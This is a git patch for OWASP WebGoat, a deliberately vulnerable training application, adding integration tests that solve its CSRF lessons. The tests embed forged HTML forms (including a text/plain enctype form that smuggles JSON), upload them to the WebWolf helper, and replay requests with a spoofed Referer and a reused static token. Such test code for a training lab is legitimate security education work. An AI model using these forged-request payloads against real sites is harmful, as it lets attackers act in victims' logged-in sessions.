From e932253f06ba481b3f42bc739e4a8badc771ade0 Mon Sep 17 00:00:00 2001
From: Rene Zubcevic <git@zubcevic.com>
Date: Sun, 13 Oct 2019 16:04:41 +0200
Subject: [PATCH] initial test cases added

---
 .../test/java/org/owasp/webgoat/CSRFTest.java | 153 ++++++++++++++++++
 .../org/owasp/webgoat/IntegrationTest.java    |  28 ++++
 .../test/java/org/owasp/webgoat/XXETest.java  |  28 ----
 .../org/owasp/webgoat/csrf/CSRFGetFlag.java   |   5 +-
 .../csrf/src/main/resources/html/CSRF.html    |   2 +-
 5 files changed, 185 insertions(+), 31 deletions(-)
 create mode 100644 webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java
new file mode 100644
index 000000000..872950ec1
--- /dev/null
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java
@@ -0,0 +1,153 @@
+package org.owasp.webgoat;
+
+import static org.junit.Assert.assertEquals;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.nio.file.Paths;
+import java.util.HashMap;
+import java.util.Map;
+
+import org.junit.Test;
+
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+
+public class CSRFTest extends IntegrationTest {
+	
+	private static final String trickHTML3 = "<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n" + 
+			"<input type=\"hidden\" name=\"csrf\" value=\"thisisnotchecked\"/>\n" + 
+			"<input type=\"submit\" name=\"submit\" value=\"assignment 3\"/>\n" + 
+			"</form></body></html>";
+	
+	private static final String trickHTML4 = "<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n" + 
+			"<input type=\"hidden\" name=\"reviewText\" value=\"hoi\"/>\n" + 
+			"<input type=\"hidden\" name=\"starts\" value=\"3\"/>\n" + 
+			"<input type=\"hidden\" name=\"validateReq\" value=\"2aa14227b9a13d0bede0388a7fba9aa9\"/>\n" + 
+			"<input type=\"submit\" name=\"submit\" value=\"assignment 4\"/>\n" + 
+			"</form>\n" + 
+			"</body></html>";
+    
+	private static final String trickHTML7 = "<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" enctype='text/plain' method=\"POST\">\n" + 
+			"<input type=\"hidden\" name='{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the best!!' value='\"}' />\n" + 
+			"<input type=\"submit\" value=\"assignment 7\"/>\n" + 
+			"</form></body></html>";
+	
+    private String webwolfFileDir;
+	
+	
+    @Test
+    public void runTests() throws IOException {
+        startLesson("CSRF");
+        
+        webwolfFileDir = getWebWolfServerPath();
+        
+        //Assignment 3
+        uploadTrickHtml("csrf3.html", trickHTML3.replace("WEBGOATURL", url("/csrf/basic-get-flag")));
+        checkAssignment3(callTrickHtml("csrf3.html"));
+        
+        uploadTrickHtml("csrf4.html", trickHTML4.replace("WEBGOATURL", url("/csrf/review")));
+        checkAssignment4(callTrickHtml("csrf4.html"));
+        
+        uploadTrickHtml("csrf7.html", trickHTML7.replace("WEBGOATURL", url("/csrf/feedback/message")));
+        //checkAssignment7(callTrickHtml("csrf7.html"));
+        
+        //checkResults("/csrf");
+        
+    }
+    
+    private void uploadTrickHtml(String htmlName, String htmlContent) throws IOException {
+    	
+    	//remove any left over html
+    	Path webWolfFilePath = Paths.get(webwolfFileDir);
+        if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),htmlName)).toFile().exists()) {
+        	Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),htmlName)));
+        }
+        
+    	//upload trick html
+        RestAssured.given()
+        .when()
+        .relaxedHTTPSValidation()
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .multiPart("file", htmlName, htmlContent.getBytes())
+        .post(webWolfUrl("/WebWolf/fileupload"))
+        .then()
+        .extract().response().getBody().asString();
+    }
+    
+    private String callTrickHtml(String htmlName) {
+    	String result = RestAssured.given()
+    	        .when()
+    	        .relaxedHTTPSValidation()
+    	        .cookie("JSESSIONID", getWebGoatCookie())
+    	        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+    	        .get(webWolfUrl("/files/"+getWebgoatUser()+"/"+htmlName))
+    	        .then()
+    	        .extract().response().getBody().asString();
+    	result = result.substring(8+result.indexOf("action=\""));
+    	result = result.substring(0, result.indexOf("\""));
+    	
+    	return result;
+    }
+    
+    private void checkAssignment3(String goatURL) {
+    	
+    	String flag = RestAssured.given()
+            	.when()
+            	.relaxedHTTPSValidation()
+            	.cookie("JSESSIONID", getWebGoatCookie())
+            	.header("Referer", webWolfUrl("/files/fake.html"))
+            	.post(goatURL)
+            	.then()
+            	.extract().path("flag").toString();
+        	
+    	Map<String, Object> params = new HashMap<>();
+        params.clear();
+        params.put("confirmFlagVal", flag);
+        checkAssignment(url("/WebGoat/csrf/confirm-flag-1"), params, true);
+    }
+    
+    private void checkAssignment4(String goatURL) {
+    	
+    	Map<String, Object> params = new HashMap<>();
+        params.clear();
+        params.put("reviewText", "test review");
+        params.put("stars", "5");
+        params.put("validateReq", "2aa14227b9a13d0bede0388a7fba9aa9");//always the same token is the weakness
+    	
+    	boolean result = RestAssured.given()
+            	.when()
+            	.relaxedHTTPSValidation()
+            	.cookie("JSESSIONID", getWebGoatCookie())
+            	.header("Referer", webWolfUrl("/files/fake.html"))
+            	.formParams(params)
+            	.post(goatURL)
+            	.then()
+            	.extract().path("lessonCompleted");
+    	assertEquals(true, result);
+        	
+    }
+    
+    private void checkAssignment7(String goatURL) {
+    	
+    	Map<String, Object> params = new HashMap<>();
+        params.clear();
+        params.put("{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the best!!", "\"}");
+       
+    	String result = RestAssured.given()
+            	.when()
+            	.relaxedHTTPSValidation()
+            	.cookie("JSESSIONID", getWebGoatCookie())
+            	.header("Referer", webWolfUrl("/files/fake.html"))
+            	.formParams(params)
+            	.log().all()
+            	.contentType(ContentType.TEXT)
+            	.post(goatURL)
+            	.then()
+            	.log().all()
+            	.extract().asString();
+        	
+    }
+    
+}
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
index 22ef1cf29..7771e86ec 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
@@ -252,5 +252,33 @@ public abstract class IntegrationTest {
                         .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
     }
     
+    public String getWebGoatServerPath() throws IOException {
+    	
+    	//read path from server
+        String result = RestAssured.given()
+        .when()
+        .relaxedHTTPSValidation()
+        .cookie("JSESSIONID", getWebGoatCookie())
+        .get(url("/WebGoat/xxe/tmpdir"))
+        .then()
+        .extract().response().getBody().asString();
+        result = result.replace("%20", " ");
+        return result;
+    }
+    
+    public String getWebWolfServerPath() throws IOException {
+    	
+    	//read path from server
+        String result = RestAssured.given()
+        .when()
+        .relaxedHTTPSValidation()
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .get(webWolfUrl("/tmpdir"))
+        .then()
+        .extract().response().getBody().asString();
+        result = result.replace("%20", " ");
+        return result;
+    }
+    
 }
 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
index 8adc1f95b..4c7070de1 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@@ -81,33 +81,5 @@ public class XXETest extends IntegrationTest {
         result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33);
         return result;
     }
-    
-    private String getWebGoatServerPath() throws IOException {
-    	
-    	//read path from server
-        String result = RestAssured.given()
-        .when()
-        .relaxedHTTPSValidation()
-        .cookie("JSESSIONID", getWebGoatCookie())
-        .get(url("/WebGoat/xxe/tmpdir"))
-        .then()
-        .extract().response().getBody().asString();
-        result = result.replace("%20", " ");
-        return result;
-    }
-    
-    private String getWebWolfServerPath() throws IOException {
-    	
-    	//read path from server
-        String result = RestAssured.given()
-        .when()
-        .relaxedHTTPSValidation()
-        .cookie("WEBWOLFSESSION", getWebWolfCookie())
-        .get(webWolfUrl("/tmpdir"))
-        .then()
-        .extract().response().getBody().asString();
-        result = result.replace("%20", " ");
-        return result;
-    }
         
 }
diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java
index 89027ed7a..f063c9208 100644
--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java
+++ b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/csrf/CSRFGetFlag.java
@@ -28,6 +28,7 @@ import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
@@ -40,7 +41,7 @@ import java.util.Random;
 /**
  * Created by jason on 9/30/17.
  */
-
+@RestController
 public class CSRFGetFlag {
 
     @Autowired
@@ -48,7 +49,7 @@ public class CSRFGetFlag {
     @Autowired
     private PluginMessages pluginMessages;
 
-    @RequestMapping(produces = {"application/json"}, method = RequestMethod.POST)
+    @RequestMapping(path="/csrf/basic-get-flag" ,produces = {"application/json"}, method = RequestMethod.POST)
     @ResponseBody
     public Map<String, Object> invoke(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
 
diff --git a/webgoat-lessons/csrf/src/main/resources/html/CSRF.html b/webgoat-lessons/csrf/src/main/resources/html/CSRF.html
index 9b9d79f02..a8119e8a6 100644
--- a/webgoat-lessons/csrf/src/main/resources/html/CSRF.html
+++ b/webgoat-lessons/csrf/src/main/resources/html/CSRF.html
@@ -139,7 +139,7 @@
   padding: 7px;
   margin-top:7px;
   padding:5px;">
-        <div class="attack-container">
+        <div class="example-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <div class="container-fluid">
                 <div class="row">